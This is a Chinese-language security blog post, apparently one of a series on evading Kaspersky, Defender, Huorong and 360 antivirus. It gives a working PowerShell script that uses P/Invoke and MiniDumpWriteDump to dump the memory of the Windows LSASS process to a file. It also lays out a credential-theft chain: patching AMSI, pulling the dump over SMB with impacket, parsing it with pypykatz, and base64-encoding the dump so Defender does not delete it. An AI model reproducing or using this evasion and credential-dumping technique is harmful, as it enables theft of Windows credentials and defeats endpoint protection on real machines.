长亭百川云 - 文章详情

卡巴defender火绒360免杀十种方法10: 草船借箭

奶牛安全

55

2024-07-13

环境

  • 带有 Ubuntu Linux AMI 的 AWS EC2 作为攻击者 C2 服务器。

  • 带有 Windows Server 2019 AMI 的 AWS EC2 作为受害者机器。

  • 安装 Visual Studio 2022 社区的本地 Windows 10 计算机用于恶意软件开发和编译

  • 本地 Kali Linux 攻击机。

过程

P/Invoke允许从非托管二进制 Windows DLL 访问结构、回调和函数,以便访问可能无法直接从 .NET 获得的原生组件中的底层 API

现在,由于知道它的作用,并且知道可以在 PowerShell 中使用 .NET,这意味着可以从 PowerShell 脚本访问底层 API,如果之前修补 AMSI,我们可以在没有 Defender 监视的情况下运行该脚本。

对于这个PoC,假设想通过 MiniDumpWriteDumpLSASS 进程转储到文件中,该文件在“Dbghelp.dll”中可用。为此,可以利用fortrananodump 工具。但是,它布满了太多defender可识别的特征。相反,可以利用 P/Invoke 编写一个 PowerShell 脚本来执行相同的操作,但可以修补 AMSI 以使其在这样做时变得不可检测。

因此,将为 PoC 使用以下 powershell 代码。

# lsaKiller.ps1Add-Type @"    using System;    using System.Runtime.InteropServices;    public class MiniDump {        [DllImport("Dbghelp.dll", SetLastError=true)]        public static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);    }"@$PROCESS_QUERY_INFORMATION = 0x0400$PROCESS_VM_READ = 0x0010$MiniDumpWithFullMemory = 0x00000002Add-Type -TypeDefinition @"    using System;    using System.Runtime.InteropServices;    public class Kernel32 {        [DllImport("kernel32.dll", SetLastError=true)]        public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);        [DllImport("kernel32.dll", SetLastError=true)]        public static extern bool CloseHandle(IntPtr hObject);    }"@$processId ="788"$processHandle = [Kernel32]::OpenProcess($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ, $false, $processId)if ($processHandle -ne [IntPtr]::Zero) {    $dumpFile = [System.IO.File]::Create("C:\users\public\test1234.txt")    $fileHandle = $dumpFile.SafeFileHandle.DangerousGetHandle()    $result = [MiniDump]::MiniDumpWriteDump($processHandle, $processId, $fileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)    if ($result) {        Write-Host "Sucess"    } else {        Write-Host "Failed" -ForegroundColor Red    }    $dumpFile.Close()    [Kernel32]::CloseHandle($processHandle)} else {    Write-Host "Failed to open process handle." -ForegroundColor Red}

在此示例中,首先通过 Add-TypeDbghelp.dll 导入 MiniDumpWriteDump 函数,然后从 kernel32.dll 导入 OpenProcessCloseHandle。然后最终得到 LSASS 进程的句柄并使用 MiniDumpWriteDump 执行进程的完整内存转储并将其写入文件。

因此,完整的 PoC 如下:

  • 执行 LSASS 转储

  • 使用 impacket-smbclient 下载转储

  • 使用 pypykatz 在本地解析 MiniDump 文件

请注意,最后使用了一个稍微修改过的脚本,该脚本在将转储写入文件之前将其加密为 base64,因为 Defender 将文件检测为 LSASS 转储并将其删除。

请点一下右下角的“在看”,谢谢!!

请帮忙点赞, 谢谢!!

请帮忙转发,谢谢!!

暗号: 054216

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2